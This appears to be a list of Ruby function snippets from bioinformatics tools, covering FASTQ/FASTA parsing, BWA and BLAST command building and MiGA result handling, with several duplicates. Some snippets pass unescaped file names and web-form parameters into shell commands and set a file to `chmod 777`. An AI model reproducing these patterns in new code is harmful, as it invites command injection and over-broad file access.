"def generate_fastq\n\n # Generate FASTQ file list, expanding patterns if found.\n fastq_input_file_list = []\n fastq_output_prefix_list = []\n fastq_output_group_list = []\n ARGV.each do |fastq_input_file|\n if fastq_input_file =~ /[\\+\\?\\*]/\n # File is regexp: use it to do our own \"glob\".\n # If the regexp has at least one group in it, save the group match\n # in a corresponding list to use in making the output files.\n fastq_input_dir = File.dirname(fastq_input_file)\n fastq_input_patt = File.basename(fastq_input_file)\n\n Dir.entries(fastq_input_dir).sort().each do |entry|\n if entry =~ /#{fastq_input_patt}()/o\n fastq_input_file_list << entry\n if not @out_prefix.nil?\n fastq_output_prefix_list << @out_prefix\n else\n fastq_output_prefix_list << entry[0..Regexp.last_match.begin(1)-1-1] # Second -1 is for underline.\n end\n fastq_output_group_list << $1\n end\n end\n else\n if File.file? fastq_input_file\n fastq_input_file_list << fastq_input_file\n fastq_output_prefix_list << @out_prefix\n end\n end\n end\n\n die \"no FASTQ files found\" if fastq_input_file_list.length == 0\n\n STDERR.puts(\"Input files: #{fastq_input_file_list}\") if @verbose\n\n fastq_list = fastq_input_file_list.zip(fastq_output_prefix_list, fastq_output_group_list)\n fastq_list.each do |fastq_input_file, fastq_output_prefix, fastq_output_group|\n\n # If we are splitting to subfiles, reset the output sub filenames to\n # the new destination for the new input file; also reset statistics.\n if @save_subfiles\n if fastq_output_group == \"\"\n fastq_output_group_mod = fastq_output_group\n else\n fastq_output_group_mod = \"_#{fastq_output_group}\"\n end\n @pass_sub_filename = File.join(@pass_dir, \"#{fastq_output_prefix}_pf#{fastq_output_group_mod}.fastq\")\n @pass_sub_filename += \".gz\" if @compress\n @reject_sub_filename = File.join(@reject_dir, \"#{fastq_output_prefix}_reject#{fastq_output_group_mod}.fastq\")\n @reject_sub_filename += \".gz\" if @compress\n\n @stats_sub_filename = File.join(@stats_dir, \"#{fastq_output_prefix}_seq_stats#{fastq_output_group_mod}.txt\")\n @pass_sub_read_cnt = @reject_sub_read_cnt = @total_sub_read_cnt = 0\n end\n\n if @save_subfiles\n open_fastq_sub_output_files\n end\n\n # split one FASTQ file into post-filter and reject FASTQ\n STDERR.puts \"Processing #{fastq_input_file}...\" if @verbose\n fastq_input_fp = open_fastq_input(fastq_input_file)\n if fastq_input_fp.nil?\n warn \"#{fastq_input_file} is empty...skipping\"\n next\n end\n begin\n while fastq_input_fp.readline\n header_line = $_\n if header_line !~ /^@/\n STDERR.puts \"Missing header line (#{header_line})...exiting\"\n exit(-1)\n end\n\n header_fields = header_line.split(/[ _]/)\n die \"header parse error at #{fastq_input_file}:#{$INPUT_LINE_NUMBER} [#{header_fields.join(\"!\")}]\" if header_fields.size != 2\n\n sub_header_fields = header_fields[1].split(\":\",-1)\n die \"sub header parse error at #{fastq_input_file}:#{$INPUT_LINE_NUMBER} [#{header_fields.join(\":\")}(#{sub_header_fields.join(\":\")})]\" if sub_header_fields.size != 4\n\n @total_read_cnt += 1\n @total_sub_read_cnt += 1\n\n if sub_header_fields[1] == \"N\"\n out = @pass\n @pass_read_cnt += 1\n out_sub = @pass_sub\n @pass_sub_read_cnt += 1\n elsif sub_header_fields[1] == \"Y\"\n out = @reject\n @reject_read_cnt += 1\n out_sub = @reject_sub\n @reject_sub_read_cnt += 1\n else\n die \"filter field value error at #{fastq_input_file}:#{$INPUT_LINE_NUMBER}...skipping read\"\n out = nil\n end\n\n # Read the rest of the sequence.\n seq_line = 
fastq_input_fp.readline\n plus_line = fastq_input_fp.readline\n if plus_line !~ /^\\+/\n STDERR.puts \"Malformed FASTQ +line (#{plus_line})\"\n end\n qual_line = fastq_input_fp.readline\n\n # Output the sequence to whatever file was chosen above.\n if !out.nil?\n if not @remove_spaces\n out.print \"#{header_line}\"\n out_sub.print \"#{header_line}\" if not out_sub.nil?\n else\n out.puts header_fields.join(\"_\")\n out_sub.puts header_fields.join(\"_\") if not out_sub.nil?\n end\n out.print \"#{seq_line}\"\n out.print \"#{plus_line}\"\n out.print \"#{qual_line}\"\n if not out_sub.nil?\n out_sub.print \"#{seq_line}\"\n out_sub.print \"#{plus_line}\"\n out_sub.print \"#{qual_line}\"\n end\n end\n end # while\n\n rescue EOFError\n\n end\n\n fastq_input_fp.close()\n\n if @save_subfiles\n close_fastq_sub_output_files\n store_stats @stats_sub_filename, @pass_sub_read_cnt, @reject_sub_read_cnt, @total_sub_read_cnt\n end\n\n end # fastq_list.each\n end",
"def buildAlignCommand(readFile, outputFile)\n cmd = \"time \" + @bwaPath + \" aln -t \" + @cpuCores.to_s + \" -I \" +\n @reference + \" \" + readFile + \" > \" + outputFile\n return cmd\n end",
"def add_result_trimmed_fasta(base, _opts)\n return nil unless\n result_files_exist?(base, '.CoupledReads.fa') ||\n result_files_exist?(base, '.SingleReads.fa') ||\n result_files_exist?(base, %w[.1.fasta .2.fasta])\n\n add_files_to_ds_result(\n MiGA::Result.new(\"#{base}.json\"), name,\n coupled: '.CoupledReads.fa',\n single: '.SingleReads.fa',\n pair1: '.1.fasta',\n pair2: '.2.fasta'\n )\n end",
"def add_result_trimmed_fasta(base, _opts)\n return nil unless\n result_files_exist?(base, '.CoupledReads.fa') ||\n result_files_exist?(base, '.SingleReads.fa') ||\n result_files_exist?(base, %w[.1.fasta .2.fasta])\n\n add_files_to_ds_result(\n MiGA::Result.new(\"#{base}.json\"), name,\n coupled: '.CoupledReads.fa',\n single: '.SingleReads.fa',\n pair1: '.1.fasta',\n pair2: '.2.fasta'\n )\n end",
"def sequence_locator(ref_option = :HXB2)\n out_array = []\n dna_seq = self.dna_hash\n title = self.title\n\n uniq_dna = dna_seq.uniq_hash\n\n uniq_dna.each do |seq,names|\n s = ViralSeq::Sequence.new('',seq)\n loc1 = s.locator(ref_option)\n s.rc!\n loc2 = s.locator(ref_option)\n loc1[2] >= loc2[2] ? (direction = :+; loc = loc1): (direction = :-; loc = loc2)\n\n names.each do |name|\n out_array << ([title, name, ref_option.to_s, direction.to_s] + loc)\n end\n end\n return out_array\n end",
"def add_result_trimmed_fasta(base, _opts)\n return nil unless\n result_files_exist?(base, \".CoupledReads.fa\") or\n result_files_exist?(base, \".SingleReads.fa\") or\n result_files_exist?(base, %w[.1.fasta .2.fasta])\n r = MiGA::Result.new(\"#{base}.json\")\n add_files_to_ds_result(r, name, coupled: \".CoupledReads.fa\",\n single: \".SingleReads.fa\", pair1: \".1.fasta\", pair2: \".2.fasta\")\n end",
"def gb_to_fasta(gb, fasta, seq_type=:nt, task_name=\"rast_annotate\")\n abort \"FATAL: Task #{task_name} requires specifying STRAIN_NAME\" unless STRAIN_NAME\n abort \"FATAL: gb_to_fasta called with invalid seq_type\" unless [:nt, :aa].include? seq_type\n system <<-SH\n module load python/2.7.6\n module load py_packages/2.7\n python #{REPO_DIR}/scripts/gb_to_fasta.py -i #{gb} -s #{seq_type} -o #{fasta}\n SH\nend",
"def bam2fastq(input_file, output_file, phred_quality)\n \t\tFile.open(output_file, 'w') do |output|\n\t\t\tinput_file.each do |line|\n \t\t\tline = line.strip.split(/\\s+/)\n \n \t\t\tflag = line[1].to_i\n \t\t\tflag & 0x40 > 0 ? mate = '1' : mate = '2'\n \t\t\t\n \t\t\tqname, sequence, quality = line[0], line[9], line[10] \n \t\t\toutput.puts \"@#{qname}/#{mate}\", sequence, '+', quality if Alignment.quality_ok?(quality, phred_quality)\n \t\tend\n \tend\n \t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Converted unmapped reads into fastq-format.\"\t\n\tend",
"def makedb\n # check if the query is a nucleotide sequence\n query_file = Bio::FastaFormat.open(@query)\n query_file.each do |entry|\n raise \"Query sequence looks like it's not nucleotide\" if !entry.isNucl?\n end\n\n # check if the target is a nucl or prot seq\n target_file = Bio::FastaFormat.open(@target)\n count_p=0\n count=0\n target_file.each do |entry|\n count_p += 1 if entry.isProt?\n count += 1\n end\n if count_p > count*0.9\n @target_is_prot = true\n else\n @target_is_prot = false\n end\n # construct the output database names\n @query_name = File.basename(@query).split('.')[0..-2].join('.')\n @target_name = File.basename(@target).split('.')[0..-2].join('.')\n\n # check if the databases already exist in @working_dir\n make_query_db_cmd = \"#{@makedb_path} -in #{@query}\"\n make_query_db_cmd << \" -dbtype nucl -title #{query_name} -out #{query_name}\"\n if !File.exists?(\"#{@working_dir}/#{query_name}.nin\")\n `#{make_query_db_cmd}`\n end\n\n make_target_db_cmd = \"#{@makedb_path} -in #{@target}\"\n make_target_db_cmd << \" -dbtype nucl \" if !@target_is_prot\n make_target_db_cmd << \" -dbtype prot \" if @target_is_prot\n make_target_db_cmd << \" -title #{target_name} -out #{target_name}\"\n\n db_target = \"#{target_name}.nsq\" if !@target_is_prot\n db_target = \"#{target_name}.psq\" if @target_is_prot\n if !File.exists?(\"#{db_target}\")\n `#{make_target_db_cmd}`\n end\n @databases = true\n [@query_name, @target_name]\n end",
"def seqshash_to_fastafile(seqs,filename)\n oa = Bio::Alignment::OriginalAlignment.new(seqs)\n string_to_file(oa.output(:fasta),filename)\n\n end",
"def add_result_distances_nonref(base)\n return nil unless\n result_files_exist?(base, %w[.aai-medoids.tsv .aai.db]) or\n result_files_exist?(base, %w[.ani-medoids.tsv .ani.db])\n r = MiGA::Result.new(\"#{base}.json\")\n add_files_to_ds_result(r, name, aai_medoids: \".aai-medoids.tsv\",\n haai_db: \".haai.db\", aai_db: \".aai.db\", ani_medoids: \".ani-medoids.tsv\",\n ani_db: \".ani.db\", ref_tree: \".nwk\", ref_tree_pdf: \".nwk.pdf\",\n intax_test: \".intax.txt\")\n end",
"def candidates2fa(input_file, fasta, read_length, output_file, exoncov=8)\n\t\tchromosomes = {}\n\t\tpositions = []\n\t\t\n\t\t# Input into hash sorted by chromosomes\n\t\tFile.open(input_file, 'r').readlines.each do |line|\n\t\t\tline = line.strip.split(\"\\t\")[0..-2]\n\t\t\tchr_a, pos_a, strand_a, chr_b, pos_b, strand_b = line[0..5]\n\t\t\tpos = [chr_a, pos_a, chr_b, pos_b].join(':')\n\t\n\t\t\tchromosomes[chr_a] = {} if !chromosomes.has_key?(chr_a)\n\t\t\t\n\t\t\tif !chromosomes.has_key?(chr_b)\n\t\t\t\tchromosomes[chr_a][chr_b] = [line]\n\t\t\n\t\t\t# 2nd elsif to exclude reads that map on same junction but opposite ends\t\t\n\t\t\telsif chromosomes[chr_a].has_key?(chr_b) && !positions.include?(pos)\n\t\t\t\tchromosomes[chr_a][chr_b].push(line)\n\t\t\t\tpositions << pos\n\t\t\tend\n\t\tend\n\n\t\t# Output\n\t\toutput = File.open(output_file, 'w') do |output|\n\t\t\tchromosomes.each do |chr_a, values|\n\t\t\t\tfasta_file = File.open(\"#{fasta}#{chr_a}.fa\", 'r')\n\t\t\t\theader = fasta_file.gets.strip\n\t\t\t\tdna_a = fasta_file.read.gsub(/\\n/, '')\n\t\t\t\t\n\t\t\t\tvalues.each do |chr_b, values|\n\t\t\t\t fasta_file = File.open(\"#{fasta}#{chr_b}.fa\", 'r')\n\t\t\t\t\theader = fasta_file.gets.strip\n\t\t\t\t\tdna_b = fasta_file.read.gsub(/\\n/, '')\n\n\t\t\t\t\tvalues.each do |v|\n\t\t\t\t\t\tbp_a, bp_b = v[1].to_i, v[4].to_i\n\t\t\t\t\t\tstrand_a, strand_b = v[2], v[5]\n\t\t\t\t\t\toverlap = v[-1].to_i - read_length\n\t\t\t\t\t\tl = read_length - exoncov \n\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\tupstream = dna_a[bp_a..bp_a + overlap + l].upcase\t\n\t\t\t\t\t\tdownstream = dna_b[bp_b - l - overlap + 1..bp_b - overlap].upcase\n\t\t\t\t\t\n\t\t\t\t\t\tif strand_a == '1' && strand_b == '-1'\n\t\t\t\t\t\t\tdownstream = Alignment.reverse_complement(dna_b[bp_b..bp_b + l].upcase)\n\t\t\t\t\t\telsif strand_a == '-1' && strand_b == '1'\n\t\t\t\t\t\t\tupstream = Alignment.reverse_complement(dna_a[bp_a - l + 1..bp_a].upcase)\n\t\t\t\t\t\tend\n\t\t\n\t\t\t\t\t\tid = [v[0..1], v[3..4]].join(':')\n\t\t\t\t\t\toutput.puts [\">#{id}\", downstream + upstream].join(\"\\n\")\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Wrote loci to fasta-file.\"\n\tend",
"def add_result_distances_ref(base)\n pref = File.dirname(base)\n return nil unless\n File.exist?(\"#{pref}/01.haai/#{name}.db\")\n r = MiGA::Result.new(\"#{base}.json\")\n r.add_files(haai_db: \"01.haai/#{name}.db\", aai_db: \"02.aai/#{name}.db\",\n ani_db: \"03.ani/#{name}.db\")\n r\n end",
"def bucketized_alignment\n # split reads into buckets according to their size and err_rate\n @buckets = bucketize(@err_rate)\n\n # perform alignment on each bucket\n @buckets.reverse_each do |lower, upper, mismatches|\n @names.set_bucket(lower, upper)\n mapped, unmapped = align(\n @ref, @ref_base, @software,\n { annotation: @annotation,\n tophat_aligner: @tophat_aligner,\n mismatches: mismatches\n }\n )\n @mapped_bams << mapped\n @unmapped_bams << unmapped\n @max_mismatches = [@max_mismatches, mismatches].max\n end\n\n # merge alignments\n @names.unset_bucket\n unbucketize(@mapped_bams, @names.get('mapped_merged'))\n unbucketize(@unmapped_bams, @names.get('unmapped_merged'))\n end",
"def before_perform \n # Init file vars \n\t @basename = File.join(job.job_dir, job.jobid)\n @infile = @basename+\".fasta\"\n @outfile = @basename+\".csblast\"\n \n # Save either the pasted Sequence from frontend or uploaded Sequence File to in file\n params_to_file(@infile, 'sequence_input', 'sequence_file')\n @informat = params['informat'] ? params['informat'] : 'fas'\n # Reformat the input sequence to match fasta format (perl script call)\n reformat(@informat, \"fas\", @infile)\n # necessary for resubmitting domains via slider\n\t File.copy(@infile, @basename+\".in\")\t\n \n # init cmd container\n @commands = []\n\n # init frontend params\n @inputmode = params['inputmode']\n @expect = params['evalue']\n @filter = params['filter'] ? 'T' : 'F'\n @mat_param = params['matrix']\n @other_advanced = params['otheradvanced']\n @descriptions = params['descr']\n @alignments = params['alignments']\n @db_path = params['std_dbs'].nil? ? \"\" : params['std_dbs'].join(' ')\n @db_path = params['user_dbs'].nil? ? @db_path : @db_path + ' ' + params['user_dbs'].join(' ')\n \n @ungapped_alignment = params['ungappedalign'] ? 'F' : 'T'\n @e_thresh = params['evalfirstit']\n @smith_wat = params['smithwat'] ? 'T' : 'F'\n @rounds = params['rounds']\n @fastmode = params['fastmode'] ? 'T' : 'F'\n @alignment = \"\"\n \n # init genome db parameter\n # getDBs is part of the GenomesModule\n gdbs = getDBs('pep')\n logger.debug(\"SELECTED GENOME DBS\\n\")\n logger.debug gdbs.join(\"\\n\")\n @db_path += ' ' + gdbs.join(' ')\n\n\n # Write confidence parameter to file in temp directory\n File.open(@basename + \".csiblast_conf\", \"w\") do |file|\n file.write(@e_thresh)\n end\n # set file rights ugo+rxw\n system(\"chmod 777 #{@basename}.csiblast_conf\")\n # if input is alignment call method process_alignment\n if (@inputmode == \"alignment\") then process_alignment end\n\n # set gapopen and gapextend costs depending on given matrix\n # default values\n @gapopen = 11\n @gapext = 1\n if (@mat_param =~ /BLOSUM80/i || @mat_param =~ /PAM70/i) then @gapopen = 10 end\n if (@mat_param =~ /PAM30/i) then @gapopen = 9 end\n if (@mat_param =~ /BLOSUM45/i) \n @gapopen = 15\n @gapext = 2\n end \n \n end",
"def add_result_distances_nonref(base)\n return nil unless\n result_files_exist?(base, %w[.aai-medoids.tsv .aai.db]) ||\n result_files_exist?(base, %w[.ani-medoids.tsv .ani.db])\n\n add_files_to_ds_result(\n MiGA::Result.new(\"#{base}.json\"), name,\n aai_medoids: '.aai-medoids.tsv',\n haai_db: '.haai.db',\n aai_db: '.aai.db',\n ani_medoids: '.ani-medoids.tsv',\n ani_db: '.ani.db',\n ref_tree: '.nwk',\n ref_tree_pdf: '.nwk.pdf',\n intax_test: '.intax.txt'\n )\n end",
"def add_result_distances_nonref(base)\n return nil unless\n result_files_exist?(base, %w[.aai-medoids.tsv .aai.db]) ||\n result_files_exist?(base, %w[.ani-medoids.tsv .ani.db])\n\n add_files_to_ds_result(\n MiGA::Result.new(\"#{base}.json\"), name,\n aai_medoids: '.aai-medoids.tsv',\n haai_db: '.haai.db',\n aai_db: '.aai.db',\n ani_medoids: '.ani-medoids.tsv',\n ani_db: '.ani.db',\n ref_tree: '.nwk',\n ref_tree_pdf: '.nwk.pdf',\n intax_test: '.intax.txt'\n )\n end",
"def fa_file\n\t\t\"#{pre}/genome.fa\" #Genome fasta location\n\tend",
"def add_result_distances_ref(base)\n pref = File.dirname(base)\n return nil unless File.exist?(\"#{pref}/01.haai/#{name}.db\")\n\n MiGA::Result.new(\"#{base}.json\").tap do |r|\n r.add_files(\n haai_db: \"01.haai/#{name}.db\",\n aai_db: \"02.aai/#{name}.db\",\n ani_db: \"03.ani/#{name}.db\"\n )\n end\n end",
"def add_result_distances_ref(base)\n pref = File.dirname(base)\n return nil unless File.exist?(\"#{pref}/01.haai/#{name}.db\")\n\n MiGA::Result.new(\"#{base}.json\").tap do |r|\n r.add_files(\n haai_db: \"01.haai/#{name}.db\",\n aai_db: \"02.aai/#{name}.db\",\n ani_db: \"03.ani/#{name}.db\"\n )\n end\n end",
"def makedb\n # only scan the first few hundred entries\n n = 100\n # check if the query is a nucl or prot seq\n query_file = Bio::FastaFormat.open(@query)\n count_p=0\n count=0\n query_file.take(n).each do |entry|\n count_p += 1 if entry.isProt?\n count += 1\n end\n if count_p > count*0.9\n @query_is_prot = true\n else\n @query_is_prot = false\n end\n\n # check if the target is a nucl or prot seq\n target_file = Bio::FastaFormat.open(@target)\n count_p=0\n count=0\n target_file.take(n).each do |entry|\n count_p += 1 if entry.isProt?\n count += 1\n end\n if count_p > count*0.9\n @target_is_prot = true\n else\n @target_is_prot = false\n end\n # construct the output database names\n @query_name = File.basename(@query).split('.')[0..-2].join('.')\n @target_name = File.basename(@target).split('.')[0..-2].join('.')\n\n # check if the databases already exist in @working_dir\n make_query_db_cmd = \"#{@makedb_path} -in #{@query}\"\n make_query_db_cmd << \" -dbtype nucl \" if !@query_is_prot\n make_query_db_cmd << \" -dbtype prot \" if @query_is_prot\n make_query_db_cmd << \" -title #{query_name} \"\n make_query_db_cmd << \" -out #{@working_dir}/#{query_name}\"\n db_query = \"#{query_name}.nsq\" if !@query_is_prot\n db_query = \"#{query_name}.psq\" if @query_is_prot\n if !File.exists?(\"#{@working_dir}/#{db_query}\")\n make_db = Cmd.new(make_query_db_cmd)\n make_db.run\n if !make_db.status.success?\n msg = \"BLAST Error creating database:\\n\" +\n make_db.stdout + \"\\n\" +\n make_db.stderr\n raise RuntimeError.new(msg)\n end\n end\n\n make_target_db_cmd = \"#{@makedb_path} -in #{@target}\"\n make_target_db_cmd << \" -dbtype nucl \" if !@target_is_prot\n make_target_db_cmd << \" -dbtype prot \" if @target_is_prot\n make_target_db_cmd << \" -title #{target_name} \"\n make_target_db_cmd << \" -out #{@working_dir}/#{target_name}\"\n\n db_target = \"#{target_name}.nsq\" if !@target_is_prot\n db_target = \"#{target_name}.psq\" if @target_is_prot\n if !File.exists?(\"#{@working_dir}/#{db_target}\")\n make_db = Cmd.new(make_target_db_cmd)\n make_db.run\n if !make_db.status.success?\n raise RuntimeError.new(\"BLAST Error creating database\")\n end\n end\n @databases = true\n [@query_name, @target_name]\n end",
"def prepare_anchorpairs(input_file, anchor_length, sequencing_type, output_file)\t\n\t\tname, mate, seq, quality = nil, nil, nil\n\t\tcounter = -1\n\n\t\tFile.open(output_file, 'w') do |output| \n\t\t\tFile.open(input_file, 'r').readlines.each do |line|\n\t\t\t\tcounter += 1\n\t\t\t\tline = line.strip\n\t\t\t\n\t\t\t\tif counter % 4 == 0 \n\t\t\t\t\tif sequencing_type == 'se'\n\t\t\t\t\t\tname, mate = line.strip, 1\n\t\t\t\t\telse\n\t\t\t\t\t\tname, mate = line.strip.split('/')\n\t\t\t\t\tend\n\t\t\t\telsif counter % 4 == 1\n\t\t\t\t\tseq = line\n\t\t\t\t\n\t\t\t\telsif counter % 4 == 3\n\t\t\t\t\tquality = line\n\t\t\t\n\t\t\t\t\tname_A = \"#{name}_#{mate}_#{seq}_A\"\n\t\t\t\t\tname_B = \"#{name}_#{mate}_#{seq}_B\"\n\t\t\t\n\t\t\t\t\tseq_A = seq[0..anchor_length - 1]\n\t\t\t\t\tseq_B = seq[-anchor_length..-1]\n\t\n\t\t\t\t\tquality_A = quality[0..anchor_length - 1]\n\t\t\t\t\tquality_B = quality[-anchor_length..-1]\n\t\t\t\n\t\t\t\t\toutput.puts [name_A, seq_A, '+', quality_A, name_B, seq_B, '+', quality_B].join(\"\\n\")\n\t\t\t\t\n\t\t\t\t\tname, mate, seq, quality = nil, nil, nil\n\t\t\t\t\tcounter = -1\n\t\t\t\tend \n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Anchor preparation finished.\"\t\n\tend",
"def getFt \n kword = ARGV[1]\n seq = @gbkObj.to_biosequence\n seqoptions = \"\" \n for c in 2..ARGV.length-1\n seqoptions += \"#{ARGV[c]},\"\n end\n # look through all features\n @gbkObj.each_cds do |ft|\n ftH = ft.to_hash\n loc = ft.locations\n gene = []\n product = []\n protId = \"\"\n if (!ftH[\"gene\"].nil? && ftH[\"gene\"][0].downcase.include?(kword.downcase)) or\n (!ftH[\"product\"].nil? && ftH[\"product\"][0].downcase.include?(kword.downcase))\n sbeg = loc[0].from.to_i\n send = loc[0].to.to_i\n fasta = Bio::Sequence::NA.new(seq.subseq(sbeg,send))\n position = \"#{sbeg}..#{send}\"\n if loc[0].strand == -1\n fasta.reverse_complement!\n position = \"c#{position}\"\n end\n pep = Bio::Sequence.new(fasta.translate)\n gene = ftH[\"gene\"][0] if !ftH[\"gene\"].nil?\n product = ftH[\"product\"][0] if !ftH[\"product\"].nil?\n protId = ftH[\"protein_id\"][0] if !ftH[\"protein_id\"].nil?\n locustag = ftH[\"locus_tag\"][0] if !ftH[\"locus_tag\"].nil?\n if seqoptions.downcase.include?(\"pep\") or seqoptions.downcase.include?(\"prot\")\n puts pep.output_fasta(\"#{@accession}|#{position}|#{protId}|#{locustag}|#{gene}|#{product}\", 60)\n else\n dna = Bio::Sequence.auto(fasta)\n puts dna.output_fasta(\"#{@accession}|#{position}|#{protId}|#{locustag}|#{gene}|#{product}\",60)\n end\n end\n end\n end",
"def prepare_anchorpairs(input_file, anchor_length, sequencing_type, output_file)\t\n\t\tname, mate, seq, quality = nil, nil, nil\n\t\tcounter = -1\n\n\t\tFile.open(output_file, 'w') do |output| \n\t\t\tFile.open(input_file, 'r').readlines.each do |line|\n\t\t\t\tcounter += 1\n\t\t\t\tline = line.strip\n\t\t\t\n\t\t\t\tif counter % 4 == 0 \n\t\t\t\t\tif sequencing_type == 'se'\n\t\t\t\t\t\tname, mate = line.strip, 1\n\t\t\t\t\telse\n\t\t\t\t\t\tname, mate = line.strip.split('/')\n\t\t\t\t\tend\n\t\t\t\telsif counter % 4 == 1\n\t\t\t\t\tseq = line\n\t\t\t\t\n\t\t\t\telsif counter % 4 == 3\n\t\t\t\t\tquality = line\n\t\t\t\n\t\t\t\t\tname_A = \"#{name}_#{mate}_#{seq}_A\"\n\t\t\t\t\tname_B = \"#{name}_#{mate}_#{seq}_B\"\n\t\t\t\n\t\t\t\t\tseq_A = seq[0..anchor_length - 1]\n\t\t\t\t\tseq_B = seq[-anchor_length..-1]\n\t\n\t\t\t\t\tquality_A = quality[0..anchor_length - 1]\n\t\t\t\t\tquality_B = quality[-anchor_length..-1]\n\t\t\t\n\t\t\t\t\toutput.puts [name_A, seq_A, '+', quality_A, name_B, seq_B, '+', quality_B].join(\"\\n\")\n\t\t\t\t\n\t\t\t\t\tname, mate, seq, quality = nil, nil, nil\n\t\t\t\t\tcounter = -1\n\t\t\t\tend \n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Anchor preparation succeded.\"\t\n\tend",
"def map_tgup_by_geneid()\n Dir.glob(\"#{$prepare_dir}/refg/*.dat\") do |input_file|\n refseq_gene_list = []\n gene_id_prefix = input_file.split(\"/\").last.split(\"\\.\").first\n puts \"gene_id prefix: #{gene_id_prefix}\"\n File.open(input_file) do |f|\n f.each_line do |line|\n columns = line.chomp.strip.split(\"\\t\")\n refseq_gene_list.push({taxid: columns[0], gene_rsrc: columns[1], gene_label: columns[2], protein_id: columns[3], gene_id: columns[4], gene_id_prefix: gene_id_prefix})\n end\n end\n\n up_list = load_up_refg(gene_id_prefix) # get same prefix data from UniProt\n refseq_gene_list.each do |refseq_data|\n match = false\n unless up_list.nil? # exist prefix list on UniProt\n match_list = up_list[refseq_data[:gene_id]]\n unless match_list.nil?\n match_list.each do |up_info|\n if refseq_data[:taxid] == up_info[:taxid]\n output_idmap(refseq_data, up_info[:upid])\n match = true\n end\n end\n end\n end\n if match == false\n $no_up += 1\n end\n end\n end\nend",
"def getFtProtID\n protein_id = ARGV[1]\n protId = \"\"\n @gbkObj.each_cds do |ft|\n ftH = ft.to_hash\n ftloc = ft.locations\n if ftH[\"protein_id\"][0].include? protein_id\n gene = []\n product = []\n gene = ftH[\"gene\"] if !ftH[\"gene\"].nil?\n product = ftH[\"product\"] if !ftH[\"product\"].nil?\n protId = ftH[\"protein_id\"][0] if !ftH[\"protein_id\"].nil?\n locustag = ftH[\"locus_tag\"][0] if !ftH[\"locus_tag\"].nil?\n if ftloc[0].strand == -1\n location = \"c#{ftloc[0].from}..#{ftloc[0].to}\"\n else\n location = \"#{ftloc[0].from}..#{ftloc[0].to}\"\n end\n dna = getDna(ft,@gbkObj.to_biosequence)\n seqout = dna.output_fasta(\"#{@accession}|#{location}|#{protId}|#{locustag}|#{gene[0]}|#{product[0]}\",60)\n puts seqout\n end\n end\n end",
"def buildSampeCommand(read1File, read2File, read1Seq, read2Seq)\n puts \"BWA command\"\n puts @bwaPath\n puts @reference\n puts read1File + \" \" + read2File\n puts read1Seq + \" \" + read2Seq\n puts @samFileName\n cmd = \"time \" + @bwaPath + \" sampe -P \" + \n \" -r \" + buildRGString() + \" \" + @reference + \" \" +\n read1File + \" \" + read2File + \" \" + read1Seq + \" \" + read2Seq +\n \" > \" + @samFileName.to_s\n puts cmd\n return cmd\n end",
"def bulk_1(opts)\n raise BFRToolsException.new(\"Missing path for bulk 1\") if opts[:path] == nil\n path = Pathname.new(opts[:path])\n raise BFRToolsException.new(\"Unable to open #{path}\") unless path.readable? or path.directory? \n\n @bulk_1_name = opts[:name] ? opts[:name] : path.basename(\".bam\")\n @bulk_1_sam = Bio::DB::Sam.new({:fasta=>@reference_path, :bam=>path})\n @bulk_1_path = path\n end",
"def msa_replace_random(dir,msa_orig_file,seqs_rand_file,msa_rand_file)\n\n\n rs=PValues::RandomSequences.new\n\n\n #all files in same directory\n msa_orig = dir + msa_orig_file\n seqs_rand = dir + seqs_rand_file\n msa_rand = dir + msa_rand_file\n\n\n rs.gen_random_seqs(msa_orig,seqs_rand)\n\n parser = UqamDoc::Parsers.new\n seqs = parser.fastafile_to_fastastring(seqs_rand)\n\n #align\n maf = UqamDoc::Mafft.new #cw2=UqamDoc::ClustalW2.new\n job_id = maf.submit_dna(seqs) #job_id= cw2.submit_dna(seqs)\n #recuperate\n fasta_str = maf.get_msa_wait(job_id) #fasta_str = cw2.get_msa_wait(job_id)\n #puts fasta_str\n\n\n parser.string_to_file(fasta_str,msa_rand)\n\n\n\n\n\n\n end",
"def help()\n $stderr.puts \"Usage: ruby __.rb -x cross_match_output -r reference.fasta -o prefix_of_output [-m minscore -s max_substitution -g max_gap] [-c]\"\nend",
"def bam2fastq(input_file, output_file, phred_quality)\n \t\tFile.open(output_file, 'w') do |output|\n\t\t\tinput_file.each do |line|\n \t\t\tline = line.strip.split(/\\s+/)\n \n \t\t\tflag = line[1].to_i\n \t\t\tflag & 0x40 > 0 ? mate = '1' : mate = '2'\n \t\t\t\n \t\t\tqname, sequence, quality = line[0], line[9], line[10] \n \t\t\toutput.puts \"@#{qname}/#{mate}\", sequence, '+', quality if Alignment.quality_ok?(quality, phred_quality)\n \t\tend\n \tend\n \t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Converted unmapped.bam into fastq-format.\"\t\n\tend",
"def write_gff_files(gene,fo,f1,f2)\r\n bioseq_seq, chr_id, chr_cord = obtain_data_from_ebi(gene) \r\n target_hash = obtain_target_from_seq(bioseq_seq)\r\n create_features_ensembl_seq_obj(bioseq_seq,target_hash)\r\n chr_target_hash=change_cord(target_hash,chr_cord)\r\n if target_hash.empty?\r\n f1.puts \"#{gene} \\n\"\r\n else\r\n #for chr gff file, #this is for the parent gene chr_id,. --> source, \"gene\", the coordinates in the chr, . --> score, strand, . --> phase, gene_id\r\n f2.puts \"#{chr_id}\\t.\\tgene\\t#{chr_cord[0]}\\t#{chr_cord[1]}\\t.\\t+\\t.\\tID=#{gene}\"\r\n end\r\n #this is for the chromosomas, chr_id, . --> source, featuretype, cordinates of the target, . --> score, strand, . --> phase, exon id and the Parent identifiers, ID=exon00001;Parent=mrna0001\r\n chr_target_hash.each do |key,value|\r\n f2.puts \"#{chr_id}\\t.\\tinterior coding exon\\t#{key[0]}\\t#{key[1]}\\t.\\t#{value[1]}\\t.\\t#{value[0]};Parent=#{gene}\"\r\n end\r\n # each loop for write in the gff file\r\n bioseq_seq.features.each do |feature|\r\n featuretype = feature.feature\r\n next unless featuretype == \"target_CTTCTT\"\r\n position = feature.position\r\n qual = feature.assoc \r\n positionss= position.split(\"..\")\r\n 